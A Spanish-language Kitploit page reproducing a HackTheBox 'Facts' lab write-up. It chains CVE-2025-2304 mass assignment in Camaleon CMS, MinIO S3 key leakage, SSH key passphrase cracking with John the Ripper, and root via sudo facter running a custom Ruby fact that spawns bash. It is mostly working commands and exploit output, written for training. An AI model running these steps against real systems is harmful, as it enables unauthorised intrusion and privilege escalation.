Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
HTB-Facts-Writeup — Writeup de la máquina HackTheBox Facts — CVE-2025-2304, enumeración de MinIO S3, descifrado de claves SSH y escalada de privilegios con facter. | Kitploit
Herramientas/GitHubGitHub/karimelsheikh1/htb-facts-writeup
Descifrado de ContraseñasEscalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónSeguridad en la Nube

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Aprendizaje y Educación
GitHubkarimelsheikh1/htb-facts-writeup

HTB-Facts-Writeup

Writeup de la máquina HackTheBox Facts — CVE-2025-2304, enumeración de MinIO S3, descifrado de claves SSH y escalada de privilegios con facter.

Ver Repositorio
hace 3 mesesAún no revisado

HackTheBox — Writeup de la máquina Facts

HackTheBox Difficulty OS

Información de la máquina

CampoDetalles
NombreFacts
SOLinux
DificultadEasy
LanzamientoSeason 10
RetiradaNo

Resumen de la cadena de ataque

root@kitploit:~
Recon → Enumeración Web → CVE-2025-2304 (Asignación Masiva) → Fuga de Credenciales S3/MinIO → Extracción de Clave SSH → Descifrado de Frase de Contraseña → Shell de Usuario → Abuso de Sudo con facter → Root

Herramientas utilizadas


Reconocimiento

Escaneo de puertos

root@kitploit:~
sudo nmap -p- --min-rate 5000 -T4 <TARGET_IP> -oN ports.nmap
sudo nmap -sV -sC -p 22,80,54321 <TARGET_IP>

Resultados:

root@kitploit:~
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu
80/tcp    open  http    nginx 1.26.3 (Camaleon CMS)
54321/tcp open  http    MinIO S3 Server
root@kitploit:~
echo "<TARGET_IP> facts.htb" | sudo tee -a /etc/hosts

Enumeración web

root@kitploit:~
feroxbuster -u http://facts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 40
curl -s http://facts.htb/robots.txt
curl -s http://facts.htb/sitemap.xml

Hallazgos clave:

  • CMS identificado: Camaleon CMS 2.9.0
  • Panel de administración: http://facts.htb/admin/login
  • Página de registro: http://facts.htb/admin/register

Acceso inicial

Paso 1 — Registrar una cuenta

Visite http://facts.htb/admin/register y cree una cuenta. Tenga en cuenta que hay un captcha: regístrese mediante el navegador.

Paso 2 — CVE-2025-2304 (Escalada de privilegios por asignación masiva)

El endpoint updated_ajax utiliza permit! permitiendo que todos los parámetros, incluido role, sean actualizados.

root@kitploit:~
git clone https://github.com/Alien0ne/CVE-2025-2304
cd CVE-2025-2304
python3 exploit.py -u http://facts.htb -U <username> -P <password> -e

Salida:

root@kitploit:~
[+] Inicio de sesión confirmado
    Rol de usuario actual: client
[+] Rol de usuario actualizado: admin
[+] Extrayendo credenciales S3
    s3 access key: AKIAA5CA83CCFE35CD69
    s3 secret key: zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n
    s3 endpoint:   http://localhost:54321

Enumeración en la nube — MinIO S3

El puerto 54321 ejecuta un servidor compatible con MinIO S3. Usando las credenciales filtradas:

root@kitploit:~
import boto3
from botocore.client import Config

s3 = boto3.client(
    's3',
    endpoint_url='http://facts.htb:54321',
    aws_access_key_id='AKIAA5CA83CCFE35CD69',
    aws_secret_access_key='zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n',
    config=Config(signature_version='s3v4'),
    region_name='us-east-1'
)

paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket='internal'):
    for o in page.get('Contents', []):
        if 'info-etags' not in o['Key']:
            print(o['Key'])
            s3.download_file('internal', o['Key'], '/tmp/' + o['Key'].replace('/', '_'))

Archivos clave encontrados:

root@kitploit:~
.ssh/authorized_keys
.ssh/id_ed25519        ← Clave privada SSH
.profile
.bashrc

Descifrado de clave SSH

root@kitploit:~
chmod 600 /tmp/.ssh_id_ed25519
ssh2john /tmp/.ssh_id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

Frase de contraseña descifrada: dragonballz


Shell de usuario

root@kitploit:~
ssh -i /tmp/.ssh_id_ed25519 [email protected]
# Introducir frase de contraseña: dragonballz
root@kitploit:~
cat /home/william/user.txt

Escalada de privilegios

Enumeración

root@kitploit:~
sudo -l
root@kitploit:~
(ALL) NOPASSWD: /usr/bin/facter

Explotación — Fact personalizado de facter (Ejecución de código Ruby)

Facter carga hechos personalizados como scripts Ruby. Como podemos ejecutarlo como root sin contraseña, inyectamos código Ruby arbitrario:

root@kitploit:~
mkdir -p /tmp/facts
cat > /tmp/facts/pwn.rb << 'EOF'
Facter.add(:pwn) do
  setcode do
    exec("/bin/bash -p")
  end
end
EOF

sudo facter --custom-dir=/tmp/facts pwn

¡Shell de root obtenida!

root@kitploit:~
whoami   # root
cat /root/root.txt

Conclusiones clave

  • Las vulnerabilidades de asignación masiva permiten la escalada de privilegios cuando la entrada no se filtra adecuadamente
  • Los buckets S3/MinIO mal configurados pueden exponer archivos sensibles, incluyendo claves privadas SSH
  • Las frases de contraseña débiles en claves SSH pueden descifrarse con listas de palabras comunes como rockyou
  • Los binarios NOPASSWD en sudo siempre deben investigarse por posibles abusos
  • Encadenar pequeñas malas configuraciones puede llevar al compromiso total del sistema

Referencias

  • CVE-2025-2304 — Asignación masiva en Camaleon CMS
  • GTFOBins — facter
  • HackTheBox

Este writeup es solo con fines educativos. Siempre realice pruebas de seguridad en sistemas que posea o tenga permiso explícito para probar.

Descargar herramienta
HerramientaPropósito
NmapEscaneo de puertos y detección de servicios
FeroxbusterEnumeración de directorios web
CVE-2025-2304 PoCEscalada de privilegios en Camaleon CMS
boto3 (Python)Enumeración y descarga de archivos desde MinIO/S3
ssh2johnConvertir clave SSH en hash descifrable
John the RipperDescifrar frase de contraseña de clave SSH
facterEscalada de privilegios mediante mala configuración de sudo